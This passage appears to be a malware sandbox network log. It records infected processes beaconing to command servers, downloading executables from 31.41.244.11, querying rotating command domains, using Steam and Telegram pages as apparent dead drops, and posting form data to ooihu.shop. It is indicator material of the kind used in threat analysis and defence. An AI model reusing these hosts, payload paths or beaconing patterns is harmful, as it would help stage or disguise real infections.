                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-us
                    DNS
                    64.206.67.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    64.206.67.172.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    43.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    43.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • flag-gb
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    2g5323.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:47:23 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=f1f9687e2d2bfd788c53af89; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • flag-us
                    DNS
                    155.143.214.23.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    155.143.214.23.in-addr.arpa
                    IN PTR
                    Response
                    155.143.214.23.in-addr.arpa
                    IN PTR
                    a23-214-143-155deploystaticakamaitechnologiescom
                  • flag-ru
                    GET
                    http://31.41.244.11/files/6904700471/Z9Pp9pM.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6904700471/Z9Pp9pM.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2660864
                    Last-Modified: Tue, 10 Dec 2024 07:14:45 GMT
                    Connection: keep-alive
                    ETag: "6757ea65-289a00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/1521297942/H3tyh96.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/1521297942/H3tyh96.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:41 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1765888
                    Last-Modified: Tue, 10 Dec 2024 09:46:58 GMT
                    Connection: keep-alive
                    ETag: "67580e12-1af200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/8049824649/yiklfON.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/8049824649/yiklfON.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:49 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 7736832
                    Last-Modified: Tue, 10 Dec 2024 17:03:36 GMT
                    Connection: keep-alive
                    ETag: "67587468-760e00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/523681048/3EUEYgl.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/523681048/3EUEYgl.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:34 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1850880
                    Last-Modified: Tue, 10 Dec 2024 17:55:01 GMT
                    Connection: keep-alive
                    ETag: "67588075-1c3e00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/unique2/random.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/unique2/random.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2012672
                    Last-Modified: Tue, 10 Dec 2024 17:32:14 GMT
                    Connection: keep-alive
                    ETag: "67587b1e-1eb600"
                    Accept-Ranges: bytes
                  • flag-us
                    DNS
                    11.244.41.31.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    11.244.41.31.in-addr.arpa
                    IN PTR
                    Response
                  • flag-ru
                    GET
                    http://185.215.113.206/
                    3d69R.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    POST
                    http://185.215.113.206/c4becf79229cb002.php
                    3d69R.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    206.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    206.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    232.168.11.51.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    232.168.11.51.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    97.17.167.52.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    97.17.167.52.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    197.87.175.4.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    197.87.175.4.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    10.109.209.205.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    10.109.209.205.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    18.31.95.13.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    18.31.95.13.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    134.130.81.91.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    134.130.81.91.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    89.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    89.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    89.210.23.2.in-addr.arpa
                    IN PTR
                    a2-23-210-89deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    fightlsoser.click
                    Z9Pp9pM.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fightlsoser.click
                    IN A
                    Response
                    fightlsoser.click
                    IN A
                    172.67.213.48
                    fightlsoser.click
                    IN A
                    104.21.35.43
                  • flag-us
                    POST
                    https://fightlsoser.click/api
                    Z9Pp9pM.exe
                    Remote address:
                    172.67.213.48:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: fightlsoser.click
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=p4hqktjst4d198821698pgdapd; expires=Sat, 05-Apr-2025 13:34:35 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0CFNuLN%2BxDQxesWJMs1h4iZtmfh95wDxscLdTdUiT%2Bv1QFoWBfDC0a3JtPk1q3TbQI6Lo8gbxTSB4qRzSUgDXQiypeYYc3PfGm6VsC2m0LqUR27Wosdk7NoZVS5vTP5AmIPHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbfe1eedaef39-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=52300&min_rtt=47504&rtt_var=19128&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=607&delivery_rate=74165&cwnd=236&unsent_bytes=0&cid=3a3bab4a226740da&ts=1287&x=0"
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                  • flag-us
                    DNS
                    48.213.67.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    48.213.67.172.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • flag-us
                    POST
                    https://covery-mover.biz/api
                    Z9Pp9pM.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=44h1o4ib6tuja1n4m60t2kn9no; expires=Sat, 05-Apr-2025 13:34:37 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=004%2BYGZem%2Fl4qkDPy6P05SWdoJkf2gRTcJoNdKfzBAhxVw5LxHGP8JAkDT7r96ZxwBnn5T2Ck3MldIbMMjss%2BlWih4ip0jdXHNwZqUvjszbbHbMYdxoyeiyfzRBgnxi1PKrB"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbff478bc9f64-AMS
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=58044&min_rtt=57559&rtt_var=17116&sent=9&recv=8&lost=0&retrans=1&sent_bytes=3558&recv_bytes=605&delivery_rate=66902&cwnd=253&unsent_bytes=0&cid=27dd95a50b1324f0&ts=593&x=0"
                  • flag-us
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-gb
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    Z9Pp9pM.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:47:59 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=e0638d04927c44b7f6264257; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • flag-us
                    DNS
                    78.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    78.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    78.210.23.2.in-addr.arpa
                    IN PTR
                    a2-23-210-78deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    t.me
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    t.me
                    IN A
                    Response
                    t.me
                    IN A
                    149.154.167.99
                  • flag-nl
                    GET
                    https://t.me/detct0r
                    3EUEYgl.exe
                    Remote address:
                    149.154.167.99:443
                    Request
                    GET /detct0r HTTP/1.1
                    Host: t.me
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0
                    Date: Tue, 10 Dec 2024 19:48:50 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 12313
                    Connection: keep-alive
                    Set-Cookie: stel_ssid=c3ec1a80f38d5c744e_57915136407261548; expires=Wed, 11 Dec 2024 19:48:50 GMT; path=/; samesite=None; secure; HttpOnly
                    Pragma: no-cache
                    Cache-control: no-store
                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                    Strict-Transport-Security: max-age=35768000
                  • flag-us
                    DNS
                    ooihu.shop
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ooihu.shop
                    IN A
                    Response
                    ooihu.shop
                    IN A
                    116.203.10.31
                  • flag-us
                    DNS
                    ooihu.shop
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ooihu.shop
                    IN A
                    Response
                    ooihu.shop
                    IN A
                    116.203.10.31
                  • flag-de
                    GET
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    GET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    99.167.154.149.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    99.167.154.149.in-addr.arpa
                    IN PTR
                    Response
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----4W4OPHD2DTRIM790ZMG4
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    70.209.201.84.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.209.201.84.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    31.10.203.116.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    31.10.203.116.in-addr.arpa
                    IN PTR
                    Response
                    31.10.203.116.in-addr.arpa
                    IN PTR
                    static3110203116clients your-serverde
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    e6.o.lencr.org
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    e6.o.lencr.org
                    IN A
                    Response
                    e6.o.lencr.org
                    IN CNAME
                    o.lencr.edgesuite.net
                    o.lencr.edgesuite.net
                    IN CNAME
                    a1887.dscq.akamai.net
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.106
                    a1887.dscq.akamai.net
                    IN A
                    88.221.134.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.113
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.97
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.114
                  • flag-us
                    DNS
                    e6.o.lencr.org
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    e6.o.lencr.org
                    IN A
                    Response
                    e6.o.lencr.org
                    IN CNAME
                    o.lencr.edgesuite.net
                    o.lencr.edgesuite.net
                    IN CNAME
                    a1887.dscq.akamai.net
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.97
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.106
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.114
                    a1887.dscq.akamai.net
                    IN A
                    88.221.134.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.113
                  • flag-gb
                    GET
                    http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D
                    3EUEYgl.exe
                    Remote address:
                    88.221.135.115:80
                    Request
                    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: e6.o.lencr.org
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: application/ocsp-response
                    Content-Length: 345
                    ETag: "4A8B461D7D0867B834B6B3D97F9425BE3F43D6D6DD06929C18B94181B0AAE0B3"
                    Last-Modified: Tue, 10 Dec 2024 01:01:00 UTC
                    Cache-Control: public, no-transform, must-revalidate, max-age=16439
                    Expires: Wed, 11 Dec 2024 00:22:51 GMT
                    Date: Tue, 10 Dec 2024 19:48:52 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    21.236.111.52.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    21.236.111.52.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    61.45.26.184.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    61.45.26.184.in-addr.arpa
                    IN PTR
                    Response
                    61.45.26.184.in-addr.arpa
                    IN PTR
                    a184-26-45-61deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    115.135.221.88.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    115.135.221.88.in-addr.arpa
                    IN PTR
                    Response
                    115.135.221.88.in-addr.arpa
                    IN PTR
                    a88-221-135-115deploystaticakamaitechnologiescom
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 300
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----SJWT2DT2NGVAAAIEUSR1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HVKNYUK6F37YM79RQ9R9
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
